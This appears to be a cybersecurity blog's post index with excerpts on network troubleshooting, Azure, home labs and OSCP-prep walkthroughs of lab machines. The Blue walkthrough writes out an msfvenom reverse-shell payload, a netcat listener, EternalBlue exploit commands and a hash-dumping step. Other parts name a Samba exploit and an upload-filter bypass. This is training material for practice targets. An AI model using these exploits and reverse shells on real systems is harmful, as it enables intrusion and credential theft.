Posts

Example of Azure Data Factory Connection

Scenario: Client A plans to send its day-to-day order history through SFTP to the internal Reporting Team, which will store it in an Azure storage account.

Features: Azure Storage account, Azure Data Factory

Key concepts (Azure Data Factory):

Pipelines and activities: a pipeline is a logical grouping of activities that together perform a task. For example, a pipeline could contain a set of activities that ingest and clean log data, and then kick off a mapping data flow to analyze the log data. The pipeline lets you manage the activities as a set instead of each one individually; you deploy and schedule the pipeline rather than the activities independently.

Azure Blob storage: a storage solution for the cloud, optimized for storing massive amounts of unstructured data. Unstructured data is data that doesn't adhere to a particular data model or definition, such as text or binary data.

● Connecting Azure Data

To be A CyberMan: Firewall Troubleshooting 3: OSPF Neighbor stuck in EXSTART/EXCHANGE state

Network Diagram
-----------------------------------------------------------------------------------------
Background
-----------------------------------------------------------------------------------------
The network infrastructure is FortiGate SD-WAN with OSPF over IPsec. Site D (172.16.4.0/24) runs the call center software, which connects to the call service at Client E (172.16.5.0/24). You can check out how to set up SD-WAN on FortiGate in this YouTube video: https://www.youtube.com/watch?v=JSYC0mqXnrg

Issue
-----------------------------------------------------------------------------------------
We were notified that calls from Site D were of poor quality.

Troubleshoot
-----------------------------------------------------------------------------------------
Call quality issues are usually related to the network connection, so we started troubleshooting from the network connection.

1. Test the network connection from Site D to Client E
   We are able to reach Client E ca

To Be A CyberMan: Set Up SFTP Server On Azure VM behind FortiGate Firewall

1. Business request
   Set up a file transfer server with public internet access.
2. Security concern
   The common options are FTP, FTPS, or SFTP. Plain FTP sends credentials and data in cleartext, and FTPS requires applying certificates to the FTP service, so I decided to go for SFTP. SolarWinds SFTP & SCP Server is a free SFTP server app.
3. Deployment
   3.1 Set up SFTP on the VM
       Download the software to the server and install it: https://www.solarwinds.com/free-tools/free-sftp-server
       Redirect the root directory
       Create a user to log in
       Verify the SFTP service is running on localhost
   3.2 Configure the host firewall and the Azure NSG to allow the SFTP service
       Add port 22 TCP to the host firewall
       Add port 22 TCP to the Azure NSG
       Verify the SFTP service is reachable for internal users
   3.3 Configure the FortiGate firewall to allow external access
       Firewall port forwarding
       Firewall policy rule with whitelist (allowed source IP) control
       Test SFTP conn

CyberRookie Project - Learning Cyber Skills By Building An Home-Lab

The reason why I rolled out this course

Hi all, this is Trevor Shi. I was in IT support back in 2019, when I created the CyberRookie Project (self-training project, version 1) and spent a year training myself to be a security analyst. From my own experience, a qualified cyber analyst should at least meet these four requirements:
1. Having cyber-related certifications
2. Having cyber knowledge
3. Having cyber hands-on skills
4. Having IT work experience
The CyberRookie course tries to cover these four domains at limited cost: get free cyber-related certifications, gain cyber knowledge, practice cyber hands-on skills, and get a deep understanding of IT systems. I believe that how good you are at cybersecurity depends on how deeply you understand the IT system.

CyberRookie Project

The CyberRookie Project is an 8-week self-study project, currently in version 2.1. Our goals are to help people with a limited IT/cyber background get into the IT/cyber field by: Learning cyber skills from a free

To Be A CyberMan: Trevor Shi CyberSecurity Blue team HomeLab V3.0

I recently updated my cybersecurity HomeLab. The design is more focused on the Blue team. This lab design can provide basic, functional IT services with continual protection and log monitoring to detect cyber attacks.

Upgrade history:
1. Upgraded the virtualization solution from VMware Player to VMware ESXi.
2. Added a WatchGuard Firewall as the gateway.
3. Added a virtual pfSense Firewall in front of the Blue Team Lab as its gateway.
4. Deployed EVE-NG with a FortiGate firewall SD-WAN lab and a Palo Alto lab.

Licensing and cost:
One of the benefits of this lab is saving money. Buying one i5 PC is enough to set it up. You do not need to put a physical firewall in front of the network; the virtual FW works just fine.

Diagram:

To Be A CyberMan: Installing PfSense on a WatchGuard Firebox

0X01 Preface
My company recently upgraded its firewall to a FortiGate firewall and retired three WatchGuard Firebox firewalls whose licenses had expired. The WatchGuard Firebox models are the XTM5 series, M400, and M470. I was wondering if I could install an open-source firewall such as pfSense on a Firebox to use as a testing lab environment.

0X02 Information
XTM5 series comes with a 1 GB CF card; the free space is not enough for the latest pfSense, so an additional hard disk is needed as the pfSense boot drive.
M400 comes with a 4 GB CF card, which can be used as the pfSense boot drive.
M470 comes with an mSATA SSD, which can be used as the pfSense boot drive.

0X03 Installing pfSense on the M400
1. Preparation:
   WatchGuard Firebox M400 appliance
   A USB flash drive
   A CF card USB reader
   A console cable (not necessary)
2. Download pfSense: https://www.pfsense.org/download
3. Download Rufus: https://rufus.ie/
4. Use Rufus to create a Pfsens

OSCP Preparation TryHackMe 02: Blue

Notification: This is not a technical step-by-step guide.

Summary
a. Initial Access: N/A
b. User Access: N/A
c. Root Access: smb-vuln-ms17-010

Tips
a. An nmap vuln scan can be helpful
b. The Meterpreter "hashdump" command dumps the local account password hashes
c. Use John or hashcat to crack the NTLM hashes

Procedure
1. Port Scan
   Nmap
   $ nmap -A -p- -T4 10.10.101.135
   $ nmap -Pn -n -sV --script vuln -oN vuln.txt 10.10.101.135
2. Exploit
   Python script
   Get the exploit from GitHub
   $ git clone https://github.com/helviojunior/MS17-010.git
   Generate the shell (LHOST is the address the shell connects back to, i.e. your own tun0 IP, not the target's)
   $ msfvenom -p windows/shell_reverse_tcp LHOST=<attacker tun0 IP> LPORT=8888 -f exe > shell.exe
   Run Netcat
   $ nc -nlvp 8888
   Exploit
   $ python send_and_execute.py 10.10.101.135 shell.exe
   MSF
   > use exploit/windows/smb/ms17_010_eternalblue
   > show options
   > set RHOSTS 10.10.101.135
   > set LHOST tun0
   > run
3. Crack the NTLM

OSCP Preparation HackTheBox 01: Lame

Notification: This is not a technical step-by-step guide.

Summary
a. Initial Access: N/A
b. User Access: N/A
c. Root Access: Samba 3.0.x "username map script" command execution

Tips
a. FTP and SSH have less chance of being exploitable here.
b. Enumeration

Procedure
1. Port Scan
   $ nmap -p- -sV --open 10.10.10.3
   $ nmap -A -p- -T4 10.10.10.3
2. Service Enumeration
   Port 21
      vsFTPd 2.3.4
      Anonymous login allowed, no files, no access to upload
      Exploit: the MSF backdoor command execution module does not work
   Port 22
      SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
      SSH with password
   Ports 139, 445
      Samba 3.x - 4.x (Samba 3.0.20-Debian), no common nmap exploit
      "tmp" share with R/W permission
      searchsploit samba 3.0 finds CVE-2007-2447
      MSF search samba 3.0 finds samba/usermap_script
3. Exploit
   Python script: https://github.com/amriunix/CVE-2007-2447
   Root file:
   MSF

OSCP Preparation TryHackMe 01: Vulnersity

Notification: This is not a technical step-by-step guide.

Summary
a. Initial Access: web upload RCE
b. User Access: web upload RCE
c. Root Access: SUID /bin/systemctl

Tips
a. Gobuster should be run at least twice, the second time against the folder found in the first round.
b. Common PHP extensions: .php .php1 .php2 .php3 .php4 .php5 .phtml
c. To identify which extensions are not blocked, fuzz the upload form: in Burp Suite set the attack type to "Sniper" with the extension list as the payload.

Procedure
1. Port Scan
   $ nmap -vv 10.10.132.213  ## scan top 1000 ports
   $ nmap -sV 10.10.132.213  ## scan top 1000 ports with service versions
   $ nmap -A -p- -T4 10.10.132.213  ## OS/service detection, all ports, aggressive timing
2. Service Enumeration
   Port 21: vsftpd 3.0.3, no anonymous login, no exploit
   Port 22: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.7
   Ports 139, 445
   Port 3138
   Port 3333: web HTTP server
      Gobuster found /internal/ upload location
      Gobuster found /internal/u
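Tip c works because the upload form rejects a short list of extensions rather than accepting a short list. The block below is an added example, not the room's application code: a constructed blocklist of the kind such a form uses, the allowlist check that replaces it, and a small fuzzer that does what the Burp Sniper run does, trying each candidate extension and reporting which ones get through.

```python
import os
import re

# Weak filter (constructed for illustration): reject a few extensions, allow the rest.
BLOCKED = {".php", ".php3", ".php4", ".php5"}


def blocklist_allows(filename: str) -> bool:
    """Vulnerable check: anything not explicitly blocked is accepted."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED


# Hardened replacement: accept only known-harmless extensions and simple basenames.
ALLOWED = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def allowlist_allows(filename: str) -> bool:
    """Safe check: one dot, allowlisted extension, plain basename (no path parts)."""
    base = os.path.basename(filename)
    stem, ext = os.path.splitext(base)
    if "." in stem:           # rejects double extensions such as shell.php.png
        return False
    if ext.lower() not in ALLOWED:
        return False
    return bool(SAFE_STEM.match(stem))


# The same list the tip gives, used as the Sniper payload set.
CANDIDATES = [".php", ".php1", ".php2", ".php3", ".php4", ".php5", ".phtml"]


def fuzz_extensions(check) -> list:
    """Like a Burp Sniper run over the extension list: which candidates does the check accept?"""
    return [ext for ext in CANDIDATES if check("shell" + ext)]


if __name__ == "__main__":
    print("blocklist lets through:", fuzz_extensions(blocklist_allows))
    print("allowlist lets through:", fuzz_extensions(allowlist_allows))
```

The blocklist version lets .php1, .php2 and .phtml through, and many default Apache/PHP configurations hand .phtml to the PHP interpreter, which is exactly the gap the room's upload bypass uses. Even with the allowlist, store uploads outside the web root and serve them with a fixed content type so a mis-handled file is never executed.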

OSCP Preparation Tool part 1:Nmap

1. How to get started quickly with one tool?
   1.1 Read the tool's man page
       $ man nmap
   1.2 Get familiar with the scanning command syntax and usage options
       1.2.1 Scanning command syntax
             $ nmap -sV $IP
       1.2.2 Usage options
   1.3 Make your own cheat sheet
       $
       $
       $
   1.4 Some tips
       1.4.1 Nmap scripts
       1.4.2 Scan order
   1.5 Practice makes perfect.
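One habit worth building into the cheat sheet is scan order: a fast all-ports discovery first, then scripts and version detection only on what came back open, and the version strings fed straight to searchsploit (the Lame and Blue walkthroughs above both follow that order by hand). The block below is an added example, not from the post: it parses nmap's normal (-oN) output into open ports and builds the second-pass command and the searchsploit terms. The scan text is constructed in that format from the services the Lame walkthrough lists and is not a real capture.

```python
import re

# Constructed sample in nmap -oN layout (not a real scan of the box).
SAMPLE_SCAN = """\
# Nmap 7.91 scan initiated as: nmap -p- -sV -oN scan.txt 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.045s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
8080/tcp closed http-proxy
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")


def parse_nmap(text: str) -> dict:
    """Extract the target and one record per port line from -oN output."""
    host, ports = None, []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return {"host": host, "ports": ports}


def open_ports(result: dict) -> list:
    return [p["port"] for p in result["ports"] if p["state"] == "open"]


def followup_command(result: dict) -> str:
    """Second pass: default scripts + versions, restricted to the ports found open."""
    plist = ",".join(str(p) for p in open_ports(result))
    return f"nmap -sV -sC -p{plist} -oN detail.txt {result['host']}"


def searchsploit_terms(result: dict) -> list:
    """Product name plus version token, deduplicated, for 'searchsploit <term>'."""
    terms = []
    for p in result["ports"]:
        if p["state"] != "open" or not p["version"]:
            continue
        words = p["version"].split()
        keep = []
        for w in words:
            keep.append(w)
            if any(ch.isdigit() for ch in w):   # stop after the first version-like token
                break
        term = " ".join(keep)
        if term not in terms:
            terms.append(term)
    return terms


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_SCAN)
    print(followup_command(scan))
    for t in searchsploit_terms(scan):
        print("searchsploit", t)
```

Replace SAMPLE_SCAN with the contents of a real -oN file to use it; -oN is the plain-text format, so a change in nmap's column layout would need the PORT_LINE pattern adjusted, whereas -oX output could be parsed with an XML parser instead.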

To be A CyberMan: The Exchange Mobile Access Rules Troubleshooting - not able to see device on Quarantined Devices list

0X00: Preview Knowledge
The company decided that only certain employees are allowed to access their email from mobile devices, so we created Device Access Rules in the Exchange admin center. We put all Android and iPhone devices into Quarantine so that we can decide whether to block or allow each one. When a mobile device tries to connect to email, the user account shows up on the Quarantined Devices list in the Exchange admin center, and the IT department grants access to the approved employees.

0X01: Issue
Some employees were not able to log into mobile email and got this notification from Exchange:
-------------------
Your device is temporarily blocked from synchronizing using Exchange ActiveSync until your administrator grants it access. Your request is currently pending.
Thank You,
IT Department
Your device is temporarily blocked from accessing content via Exchange ActiveSync because the device has been quarantined. You don't need to

To Be A CyberMan: What I have Done Within A Year (Sep2019-Sep2020)

Language Skills
1. Completed ESL level 7-8 course
2. Made 3 public speeches; achieved "Best Speaker" 2 times in Toastmasters

Personal Development
1. Completed some cybersecurity online training courses
   a. SANS Cyber Aces Online
   b. Culturelink's Cybersecurity Training Program: CSX Cybersecurity Fundamentals
   c. Fortinet NSE 1, 2, 4 and 5 Network Security Associate online training
   d. Palo Alto Networks online courses
      i. Introduction to Cybersecurity (EDU-010)
      ii. Firewall 9.0 Essentials: Configuration and Management (EDU-110)
      iii. Cybersecurity Skills Practice Lab
   e. Qualys Training
      i. Vulnerability Management
      ii. Advanced Scanning
   f. Cybrary courses
      i. pfSense: Installing and Configuring the Firewall
      ii. VMware Foundations
   g. edX course
      i. Microsoft IT Support: Cloud Fundamentals